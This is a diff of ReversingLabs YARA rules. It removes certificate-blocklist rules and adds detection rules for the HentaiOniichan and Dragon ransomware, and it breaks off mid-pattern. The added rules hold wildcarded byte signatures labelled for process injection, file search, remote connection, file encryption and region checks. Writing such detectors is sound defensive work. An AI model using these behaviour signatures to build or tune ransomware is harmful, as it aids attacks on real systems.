-		modified = "2023-11-08"
+		id = "cd5e916f-7195-5bb6-abff-b08231053f9a"
+		date = "2021-03-05"
+		modified = "2021-03-05"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L2788-L2804"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.HentaiOniichan.yara#L1-L140"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "0c7c9e8d2a9304e0407b8a1a29977312a9ba766a4052c6b874855fa187c85585"
+		logic_hash = "153526e5a2f05bc8e3f77d83eefce6b4cd962ea093b6f1c0ab8fcabe8d8a7ad9"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "HentaiOniichan"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE4\\xB8\\x8A\\xE6\\xB5\\xB7\\xE5\\x9F\\x9F\\xE8\\x81\\x94\\xE8\\xBD\\xAF\\xE4\\xBB\\xB6\\xE6\\x8A\\x80\\xE6\\x9C\\xAF\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures [ i ] . serial == "5f:78:14:9e:b4:f7:5e:b1:74:04:a8:14:3a:ae:ae:d7" and 1303116124 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_629D120Dd84F9C1688D4Da40366Fab7A : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "7e6249ba-3a4f-5096-be32-779e73c88221"
-		date = "2020-08-05"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L2806-L2822"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "187f6ef0de869500526d1b0d5c6f6762b0a939e06781e633a602834687c64023"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$find_files_p1 = {
+            8B FF 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 4D ?? 8B 55 ?? 53
+            57 8B 7D ?? 89 95 ?? ?? ?? ?? 3B CF 74 ?? 8A 01 3C ?? 74 ?? 3C ?? 74 ?? 3C ?? 74 ??
+            51 57 E8 ?? ?? ?? ?? 59 59 8B C8 3B CF 75 ?? 8B 95 ?? ?? ?? ?? 8A 01 88 85 ?? ?? ??
+            ?? 3C ?? 75 ?? 8D 47 ?? 3B C8 74 ?? 52 33 DB 53 53 57 E8 ?? ?? ?? ?? 83 C4 ?? E9 ??
+            ?? ?? ?? 8A 85 ?? ?? ?? ?? 33 DB 3C ?? 74 ?? 3C ?? 74 ?? 3C ?? 8A C3 75 ?? B0 ?? 2B
+            CF 0F B6 C0 41 89 9D ?? ?? ?? ?? F7 D8 89 9D ?? ?? ?? ?? 56 1B C0 89 9D ?? ?? ?? ??
+            23 C1 89 9D ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 88 9D ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 57 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? F7 D8
+        }
+		$find_files_p2 = {
+            1B C0 53 53 53 51 F7 D0 23 85 ?? ?? ?? ?? 53 50 FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 75
+            ?? FF B5 ?? ?? ?? ?? 53 53 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B D8 E9 ?? ?? ?? ?? 8B 85 ??
+            ?? ?? ?? 8B 48 ?? 2B 08 C1 F9 ?? 89 8D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ??
+            ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 88 9D ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ??
+            ?? 83 C4 ?? F7 D8 1B C0 F7 D0 23 85 ?? ?? ?? ?? 80 38 ?? 75 ?? 8A 48 ?? 84 C9 74 ??
+            80 F9 ?? 75 ?? 38 58 ?? 74 ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 57 50 E8 ?? ?? ??
+            ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 85 C0 75 ?? 38 9D ?? ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 59 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ??
+            8B 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 10 8B 40 ?? 2B C2 C1 F8 ?? 3B C8 74 ?? 68 ??
+            ?? ?? ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 38 9D ?? ?? ?? ??
+            74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 59 8B D8 56 FF 15 ?? ?? ??
+            ?? 80 BD ?? ?? ?? ?? ?? 5E 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8B C3 8B 4D ??
+            5F 33 CD 5B E8 ?? ?? ?? ?? C9 C3
+        }
+		$inject_code_into_process = {
+            33 C0 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 6A ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 85
+            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B F8 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
+            50 57 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 0F 1F 84 00 ?? ?? ?? ?? 8B C6 8D 8D
+            ?? ?? ?? ?? 66 8B 11 66 3B 10 75 ?? 66 85 D2 74 ?? 66 8B 51 ?? 66 3B 50 ?? 75 ?? 83
+            C1 ?? 83 C0 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 75 ?? FF B5 ?? ?? ??
+            ?? 50 6A ?? FF 15 ?? ?? ?? ?? 8B F0 85 F6 74 ?? FF 15 ?? ?? ?? ?? 39 85 ?? ?? ?? ??
+            74 ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8D 85 ?? ??
+            ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? C6 45 ??
+            ?? 8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2
+            ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ??
+            ?? 8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2
+            ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 8D ??
+            ?? ?? ?? 83 C1 ?? 89 8D ?? ?? ?? ?? 3B 8D ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? 8B
+            4D ?? 85 C9 74 ?? 51 8B D0 E8 ?? ?? ?? ?? 8B 4D ?? B8 ?? ?? ?? ?? 8B 75 ?? 83 C4 ??
+            2B CE F7 E9 C1 FA ?? 8B C2 C1 E8 ?? 03 C2 8D 0C 40 8B C6 C1 E1 ?? 81 F9 ?? ?? ?? ??
+            72 ?? 8B 76 ?? 83 C1 ?? 2B C6 83 C0 ?? 83 F8 ?? 77 ?? 51 56 E8 ?? ?? ?? ?? 83 C4 ??
+            8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D 8B E3
+            5B C3 E8
+        }
+		$remote_connection_p1 = {
+            68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 45 ?? C7 45
+            ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 0F 28 45
+            ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ??
+            ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 0F EF 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ??
+            C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 0F 29 45 ?? 0F 28 45
+            ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ??
+            ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 0F EF 85 ?? ?? ?? ?? 50 0F 29 45 ?? E8 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 45
+            ?? C7 45 ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ??
+            0F 28 45 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ??
+            ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 0F EF 85 ?? ?? ?? ?? 0F 29 45 ??
+            C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ??
+            0F 28 45 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ??
+            ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 0F EF 85 ?? ?? ?? ?? C7 45 ?? ??
+            ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 0F 29 45
+        }
+		$remote_connection_p2 = {
+            0F 28 45 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ??
+            ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 0F EF 85 ?? ?? ?? ?? 50 0F 29 45
+            ?? E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 0F 43 95
+            ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 85 C0 75 ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 6A ?? 8B 40 ?? 03 C8 33 C0 39 41
+            ?? 0F 94 C0 8D 04 85 ?? ?? ?? ?? 0B 41 ?? 50 E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? B8 ??
+            ?? ?? ?? 2B C1 83 F8 ?? 0F 82 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 51
+            0F 43 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 50 6A ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50
+            FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ??
+            0F 43 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? 6A ?? 6A ?? 50 E8 ?? ?? ??
+            ?? 83 C4 ?? 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? 83 BD ?? ?? ?? ??
+            ?? 8B 85 ?? ?? ?? ?? 0F 43 8D ?? ?? ?? ?? 03 C1 50 51 8D 85 ?? ?? ?? ?? 50 8D 4D ??
+            E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 0F 43
+            85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 83 C4 ?? 8B F0 83 FA ?? 72 ?? 8B
+            8D ?? ?? ?? ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ??
+            2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4
+        }
+		$encrypt_files = {
+            8B FF 55 8B EC 83 EC ?? 8B 4D ?? 89 4D ?? 53 56 8B 75 ?? 57 8B 7D ?? 89 7D ?? 85 C9
+            0F 84 ?? ?? ?? ?? 85 FF 75 ?? E8 ?? ?? ?? ?? 83 20 ?? E8 ?? ?? ?? ?? C7 00 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 83 C8 ?? E9 ?? ?? ?? ?? 8B C6 8B D6 C1 FA ?? 83 E0 ?? 6B C0 ?? 89
+            55 ?? 8B 14 95 ?? ?? ?? ?? 89 45 ?? 8A 5C 02 ?? 80 FB ?? 74 ?? 80 FB ?? 75 ?? 8B C1
+            F7 D0 A8 ?? 74 ?? 8B 45 ?? F6 44 02 ?? ?? 74 ?? 6A ?? 6A ?? 6A ?? 56 E8 ?? ?? ?? ??
+            83 C4 ?? 56 E8 ?? ?? ?? ?? 59 84 C0 74 ?? 84 DB 74 ?? FE CB 80 FB ?? 0F 87 ?? ?? ??
+            ?? FF 75 ?? 8D 45 ?? 57 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 E9 ?? ?? ?? ?? FF 75 ?? 8D
+            45 ?? 57 56 50 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 8B 45 ?? 8B 0C 85 ?? ?? ?? ?? 8B 45 ??
+            80 7C 01 ?? ?? 7D ?? 0F BE C3 83 E8 ?? 74 ?? 83 E8 ?? 74 ?? 83 E8 ?? 0F 85 ?? ?? ??
+            ?? FF 75 ?? 8D 45 ?? 57 56 50 E8 ?? ?? ?? ?? EB ?? FF 75 ?? 8D 45 ?? 57 56 50 E8 ??
+            ?? ?? ?? EB ?? FF 75 ?? 8D 45 ?? 57 56 50 E8 ?? ?? ?? ?? EB ?? 8B 4C 01 ?? 8D 7D ??
+            33 C0 AB 6A ?? AB AB 8D 45 ?? 50 FF 75 ?? FF 75 ?? 51 FF 15 ?? ?? ?? ?? 85 C0 75 ??
+            FF 15 ?? ?? ?? ?? 89 45 ?? 8D 75 ?? 8D 7D ?? A5 A5 A5 8B 45 ?? 85 C0 75 ?? 8B 45 ??
+            85 C0 74 ?? 6A ?? 5E 3B C6 75 ?? E8 ?? ?? ?? ?? C7 00 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89
+            30 E9 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 E9 ?? ?? ?? ?? 8B 7D ?? 8B 45 ?? 8B 4D ?? 8B
+            04 85 ?? ?? ?? ?? F6 44 08 ?? ?? 74 ?? 80 3F ?? 74 ?? E8 ?? ?? ?? ?? C7 00 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 83 20 ?? E9 ?? ?? ?? ?? 2B 45 ?? EB ?? 33 C0 5F 5E 5B C9 C3
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Delta Controls" and pe.signatures [ i ] . serial == "62:9d:12:0d:d8:4f:9c:16:88:d4:da:40:36:6f:ab:7a" and 1306799999 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $inject_code_into_process ) and ( all of ( $find_files_p* ) ) and ( $encrypt_files ) and ( all of ( $remote_connection_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_039E5D0E3297F574Db99E1D9503853D9 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Dragon : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Dragon ransomware."
 		author = "ReversingLabs"
-		id = "969ffa17-de06-58d5-a74e-c115b49a9a6c"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "dbeab955-f1fe-57eb-a9a4-c8c885ab7fad"
+		date = "2020-10-30"
+		modified = "2020-10-30"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L2824-L2840"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Dragon.yara#L1-L149"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "2f150f60b7dce583fc68705f0b29a7c8684f1b69020275b2ec1ac6beeaa63952"
+		logic_hash = "7298c5681deaf04abb6a656cefc09b5ee4096ff7a5028caab1d7b107e97be90a"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Dragon"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Cigam Software Corporativo LTDA" and pe.signatures [ i ] . serial == "03:9e:5d:0e:32:97:f5:74:db:99:e1:d9:50:38:53:d9" and 1378079999 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_Bc32Bbe5Bbb4F06F490C50651Cd5Da50 : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "eb6ccc6d-2a66-5113-8b78-c32012431123"
-		date = "2020-08-05"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L2842-L2860"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "104be481b7d4b1cb3c43c72314afc3641983838b5177c34a88d6da0d0e7b89c9"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$remote_connection_p1 = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
+            33 C5 89 45 ?? 56 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A
+            ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ??
+            85 C0 0F 85 ?? ?? ?? ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? 88 45 ?? 83 EC ?? 89 45 ?? 8B
+            CC 89 A5 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8B CC E8 ??
+            ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8B D0 C6 45 ?? ?? 8D 8D ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 8B F0 68 ?? ?? ?? ?? BA ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 83 C4 ?? 56 8B D0 C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 C4 ?? C6
+            45 ?? ?? 8B 95 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 42 8B C1 81 FA ?? ?? ??
+            ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ??
+            ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ??
+            ?? ?? ?? ?? C6 45 ?? ?? 8B 95 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 42 8B C1
+        }
+		$remote_connection_p2 = {
+            81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ??
+            52 51 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ??
+            ?? ?? C6 85 ?? ?? ?? ?? ?? C6 45 ?? ?? 8B 95 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ??
+            ?? ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F
+            87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? 8D 4D ?? 8D 55 ?? C7 85 ??
+            ?? ?? ?? ?? ?? ?? ?? 0F 43 4D ?? 51 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 55 ?? 83 FA
+            ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ??
+            83 F8 ?? 77 ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ??
+            ?? ?? ?? ?? C6 45 ?? ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B
+            49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ??
+            64 89 0D ?? ?? ?? ?? 59 5E 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$find_files_1 = {
+            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 57 83 EC ?? 89 8D ??
+            ?? ?? ?? 8B D4 8D 71 ?? C7 42 ?? ?? ?? ?? ?? C7 42 ?? ?? ?? ?? ?? C6 02 ?? 8A 01 41
+            84 C0 75 ?? 2B CE 8B B5 ?? ?? ?? ?? 51 56 8B CA E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 56 8D
+            85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 8D 85
+            ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F8 83 FF ?? 0F 84 ?? ?? ?? ?? 8B 1D
+        }
+		$find_files_2 = {
+            8A 10 3A 11 75 ?? 84 D2 74 ?? 8A 50 ?? 3A 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 84 D2 75 ??
+            33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? B8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ??
+            8A 11 3A 10 75 ?? 84 D2 74 ?? 8A 51 ?? 3A 50 ?? 75 ?? 83 C1 ?? 83 C0 ?? 84 D2 75 ??
+            33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ??
+            ?? 56 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 51 8B D4 8D 8D ?? ?? ?? ??
+            8D 71 ?? C7 42 ?? ?? ?? ?? ?? C7 42 ?? ?? ?? ?? ?? C6 02 ?? 8A 01 41 84 C0 75 ?? 2B
+            CE 8D 85 ?? ?? ?? ?? 51 50 8B CA E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 84 C0 74 ??
+            83 EC ?? 8B CC 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4
+            ?? F6 85 ?? ?? ?? ?? ?? 74 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8D
+            85 ?? ?? ?? ?? 50 57 FF D3 85 C0 0F 85 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 8B 4D ?? 5F
+            5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$skip_hk_china_taiwan_p1 = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
+            33 C5 89 45 ?? 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ??
+            50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85
+            C0 0F 85 ?? ?? ?? ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? 88 45 ?? 89 45 ?? 8D 4D ?? 6A ??
+            68 ?? ?? ?? ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? 88 45 ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D
+            4D ?? 83 7D ?? ?? 8D 55 ?? 0F 43 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ??
+            ?? ?? FF 15 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ??
+            C7 45 ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? 6A ??
+            68 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ??
+            C6 45 ?? ?? 8D 4D ?? 6A ?? 68 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ??
+            C6 45 ?? ?? E8 ?? ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 83 F8
+            ?? 0F 85 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ??
+            ?? ?? 6A ?? 8D 45 ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 8B 55 ??
+            83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83
+            C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 83 FA ?? 72
+            ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8
